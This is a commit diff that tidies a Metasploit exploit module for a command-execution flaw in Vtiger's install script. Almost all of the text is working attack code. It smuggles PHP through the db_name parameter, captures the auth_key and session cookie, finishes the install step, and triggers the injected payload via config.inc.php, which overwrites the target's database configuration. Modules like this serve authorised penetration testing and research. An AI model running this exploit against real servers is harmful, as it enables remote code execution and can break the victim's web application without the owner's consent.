Fix everything that needs to be fixed
parent
ca7dcc0781
commit
4012dd0acc
|
@ -6,7 +6,9 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking # Application database configuration is overwritten
|
||||
|
||||
# Application database configuration is overwritten
|
||||
Rank = ManualRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
|
||||
|
@ -16,12 +18,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits an arbitrary command execution vulnerability in the
|
||||
Vtiger install script. This module is set to ManualRanking due to this
|
||||
module overwriting the target database configuration, which may introduce target
|
||||
instability.
|
||||
module overwriting the target database configuration, which may result in
|
||||
a broken web app, and you may not be able to get a session again.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Jonathan Borgeaud < research[at]navixia.com >', # Navixia Research Team
|
||||
'Jonathan Borgeaud < research[at]navixia.com >' # Navixia Research Team
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
|
@ -51,62 +53,63 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def uri
|
||||
return target_uri.path
|
||||
end
|
||||
|
||||
def check
|
||||
return Exploit::CheckCode::Unsupported
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("Injecting payload...")
|
||||
rand_arg = Rex::Text.rand_text_hex(10)
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'vars_get' =>
|
||||
{
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
|
||||
'vars_get' => {
|
||||
'module' => 'Install',
|
||||
'view' => 'Index',
|
||||
'mode' => 'Step5',
|
||||
'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // ",
|
||||
},
|
||||
'headers' => {'X-Requested-With' => 'whatever'}
|
||||
})
|
||||
'db_name' => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // "
|
||||
}})
|
||||
|
||||
re_authkey='(name)(=)(")(auth_key)(")(\\s+)(value)(=)(").*?((?:[a-z0-9]*))(")'
|
||||
m=Regexp.new(re_authkey,Regexp::IGNORECASE);
|
||||
# Check timeout
|
||||
if not res
|
||||
print_error("Request timed out, please try again")
|
||||
return
|
||||
end
|
||||
|
||||
if m.match(res.body)
|
||||
authkey=m.match(res.body)[10]
|
||||
if res.body =~ /name="auth_key"\s+value=".*?((?:[a-z0-9]*))"/i
|
||||
authkey = $1
|
||||
phpsessid = res.get_cookies
|
||||
print_status("Retrieved Authkey : #{authkey}");
|
||||
print_status("Retrieved PHPSESSID : #{phpsessid}");
|
||||
|
||||
if authkey.blank?
|
||||
print_error("No AuthKey found")
|
||||
return
|
||||
elsif phpsessid.blank?
|
||||
print_error("No PHP Session ID found")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("Retrieved Authkey : #{authkey}")
|
||||
print_status("Retrieved PHPSESSID : #{phpsessid}")
|
||||
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'index.php'),
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'headers' => {'X-Requested-With' => rand_text_alpha(5)},
|
||||
'cookie' => phpsessid,
|
||||
'vars_get' =>
|
||||
{
|
||||
'module' => 'Install',
|
||||
'view' => 'Index',
|
||||
'mode' => 'Step7',
|
||||
'auth_key' => authkey
|
||||
},
|
||||
'headers' => {'X-Requested-With' => 'pwned'},
|
||||
'cookie' => phpsessid
|
||||
}
|
||||
})
|
||||
|
||||
print_status("Executing payload...")
|
||||
send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => normalize_uri(uri, 'config.inc.php'),
|
||||
'vars_get' =>
|
||||
{
|
||||
rand_arg => '1',
|
||||
}
|
||||
'uri' => normalize_uri(target_uri.path, 'config.inc.php'),
|
||||
'vars_get' => { rand_arg => '1' }
|
||||
})
|
||||
else
|
||||
print_error("No auth_key pattern found")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue